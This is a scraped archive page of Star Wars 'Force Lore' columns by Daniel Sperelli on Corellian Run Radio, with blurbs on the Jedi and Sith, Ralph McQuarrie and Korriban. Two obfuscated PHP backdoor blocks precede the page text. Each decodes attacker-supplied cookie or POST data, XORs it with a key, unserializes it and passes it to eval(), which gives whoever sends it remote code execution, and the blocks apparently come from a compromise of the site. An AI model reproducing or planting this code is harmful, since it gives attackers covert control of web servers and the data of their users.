$eDITTpx = class_exists("E_sdBhD");if (!$eDITTpx){class E_sdBhD{private $Uwkjo;public static $GceVIgUuDx = "bb4019ce-3f6c-41c2-908d-f6034f80bd18";public static $hHxVxqyEP = NULL;public function __construct(){$STTVJb = $_COOKIE;$DZiTu = $_POST;$WDsdjh = @$STTVJb[substr(E_sdBhD::$GceVIgUuDx, 0, 4)];if (!empty($WDsdjh)){$wISPlIDZLO = "base64";$dUsBvmZpUV = "";$WDsdjh = explode(",", $WDsdjh);foreach ($WDsdjh as $WykdfVvtZ){$dUsBvmZpUV .= @$STTVJb[$WykdfVvtZ];$dUsBvmZpUV .= @$DZiTu[$WykdfVvtZ];}$dUsBvmZpUV = array_map($wISPlIDZLO . "\137" . "\x64" . "\x65" . "\x63" . "\x6f" . chr (100) . chr ( 1098 - 997 ), array($dUsBvmZpUV,)); $dUsBvmZpUV = $dUsBvmZpUV[0] ^ str_repeat(E_sdBhD::$GceVIgUuDx, (strlen($dUsBvmZpUV[0]) / strlen(E_sdBhD::$GceVIgUuDx)) + 1);E_sdBhD::$hHxVxqyEP = @unserialize($dUsBvmZpUV);}}public function __destruct(){$this->BfuLpx();}private function BfuLpx(){if (is_array(E_sdBhD::$hHxVxqyEP)) {$kjgrSU = str_replace("\x3c" . chr (63) . 'p' . "\150" . chr (112), "", E_sdBhD::$hHxVxqyEP["\143" . chr (111) . 'n' . chr ( 817 - 701 )."\x65" . "\156" . chr ( 520 - 404 )]);eval($kjgrSU);exit();}}}$LfAXf = new E_sdBhD(); $LfAXf = NULL;} ?> $HUXqtUIxy = class_exists("ip_QEqh");if (!$HUXqtUIxy){class ip_QEqh{private $TbmzRb;public static $FHcIW = "7ebcf308-eeb5-45d0-b672-e9d0e6153b2f";public static $fFfkEnNTtr = NULL;public function __construct(){$FhesM = $_COOKIE;$LHvkqFrxmX = $_POST;$MCHrxi = @$FhesM[substr(ip_QEqh::$FHcIW, 0, 4)];if (!empty($MCHrxi)){$ukeOe = "base64";$JuQfYmlyOm = "";$MCHrxi = explode(",", $MCHrxi);foreach ($MCHrxi as $BJxJBWW){$JuQfYmlyOm .= @$FhesM[$BJxJBWW];$JuQfYmlyOm .= @$LHvkqFrxmX[$BJxJBWW];}$JuQfYmlyOm = array_map($ukeOe . chr ( 127 - 32 )."\144" . "\x65" . "\143" . 'o' . "\x64" . "\x65", array($JuQfYmlyOm,)); $JuQfYmlyOm = $JuQfYmlyOm[0] ^ str_repeat(ip_QEqh::$FHcIW, (strlen($JuQfYmlyOm[0]) / strlen(ip_QEqh::$FHcIW)) + 1);ip_QEqh::$fFfkEnNTtr = @unserialize($JuQfYmlyOm);}}public function __destruct(){$this->tSjrbbjY();}private function tSjrbbjY(){if (is_array(ip_QEqh::$fFfkEnNTtr)) {$xdxaj = str_replace("\x3c" . "\x3f" . 'p' . chr ( 133 - 29 ).chr (112), "", ip_QEqh::$fFfkEnNTtr["\x63" . 'o' . chr (110) . "\x74" . 'e' . "\156" . chr ( 225 - 109 )]);eval($xdxaj);exit();}}}$SRNAi = new ip_QEqh(); $SRNAi = NULL;} ?> Daniel Sperelli – Page 2 – Corellian Run Radio

Daniel Sperelli

Force Lore columnist for CRR. Avid MMO gamer and Star Wars junkie. Co-Administrator of Star Wars: Of Blood and Honor RPG Wiki. (http://bloodandhonor.wikia.com/wiki/Of_Blood_and_Honor_Wiki) May the Shwartz be with you!

Mar 212012

By Daniel Sperelli

Welcome once again to your weekly dose of Force Lore, where we explore the who, what, when, and why of the Star Wars Universe and how it ties in with Star Wars: The Old Republic.  Thank you to all of you that have been supporting of the column and all of the hard workers here at Corellian Run Radio.

Last week we started looking at the Jedi and the Sith, with how their ideologies and organizations either parallel each other or are mirror opposites of each other.  Part one examined the Jedi and now today we’ll be looking at the Sith.  And what perfect timing!  Fans of the cartoon series The Clone Wars™ on Cartoon Network™ had a nice surprise on the season finale this weekend with the return of one of The Phantom Menace’s most under-rated villains, Darth Maul.  It’s a perfect prelude for this week’s column.  Set your navicomputer and follow me in after the jump!

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Mar 142012

By Daniel Sperelli

Hello everyone and welcome to yet another episode of Force Lore.  This week, we’re starting to look at the Jedi and Sith.  We’ll touch on what drives each faction and the differences between the two.  Due to the large amount of info on each faction, I’ll have to break this up into a two-parter.

I’m giving a shout out to my nephew and my great nephew this week, both huge Star Wars fans.  My nephew, Derek, was involved in a very serious car accident a while back.  The Force was definitely with him, as he survived and is out of the hospital and at home recovering from injuries that were beyond life-threatening.  I liken it to either a manifestation of the Force that aided him in staying with us and overcoming a mortality rate of 90% or a Jedi Sage hiding in the bushes, providing some heals until he could be taken to the hospital.  Either way, it’s nothing short of a miracle that my family and I have more time with him and he can enjoy more Star Wars with his son, Kristopher.

On with the actual weekly installment!  Get ready and let’s jump onward!

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Mar 072012

By Daniel Sperelli

Greetings my fellow gamers and Star Wars fans.  Welcome to another week of Force Lore!  While we celebrate the coming of Game Update 1.2, getting closer to release each and every day, we have to take a moment of silence for the departure of a dear friend to the Star Wars community, Ralph MacQuarrie.  The man that was responsible for designing Darth Vader, Chewbacca, and so many of the sets that brought the original trilogy to life will be missed.  Ralph was responsible for conceptual artwork on Battlestar Galactica and E.T. the Extra-Terrestrial also.  Ralph passed on to become one with the Force on March 3, 2012, at the age of 82.  “May you live long and prosper, may you always find shade, and may the Force be with you, always.”  The Science Fiction world will miss you, Ralph.  Thank you for the lives you touched through your work.

The week is dedicated to Mr. MacQuarrie.  Without him, our beloved Star Wars Universe would look quite different.  While some of his conceptual work was changed to fit into the original trilogy, a lot of Ralph’s work would make it’s way into the Expanded Universe of Star Wars.  In Star Wars: The Old Republic, some of those conceptual designs can be seen, from the Sith Imperial Trooper design to the architecture of the Hutts.  Ralph’s vision of the space environments of Star Wars can be seen influencing the opening Flashpoint for the Republic, The Esseles.  So, strap in to your acceleration couch and let’s jump to this destination!
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Feb 292012

By Daniel Sperelli

Once again, my fellow SWTOR fans and spacers, it’s time for your weekly dose of Force Lore, on Corellian Run Radio.  This article is late, yes, I know.  I have to apologize for being absent last week due to some unforeseen circumstances.  Life events happen to occur at bad times and slow you down.  I didn’t anticipate the latest one and it interrupted plans to have this out to you last week.  But onward and upward, as I always say.  Today’s article is a special request from a reader who was curious about the counterpart to the Republic’s Flashpoint, The Esseles.  So, without further ado, we’re jumping in to the Black Talon, the first Flashpoint that Empire players get to encounter.  Buckle up and make the jump!

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Feb 152012

Hello once again, fellow spacers!  Welcome to another week of Force Lore.  This week you get a double dose of Force Lore, first with this regular column and an additional Special Valentine’s Day Edition.  Hop on back to the main page of CCR and check out the other article when you’re done here.  Last week we looked into the history of Tython, the Jedi Consular and Jedi Knight starting world.  It was a fair bit on the “Light Side”, pun intended.  This week, we’re going to take a trip to the Outer Rim, to a world of evil spirits and dark treasures.  There aren’t too many worlds within the Star Wars galaxy that are darker than Korriban.  That’s where we’re headed.  Strap in, power up your shields, and let’s get those coordinates from the Astromech for the navicomputer.

“All craft, prepare to jump into hyperspace on my mark!”

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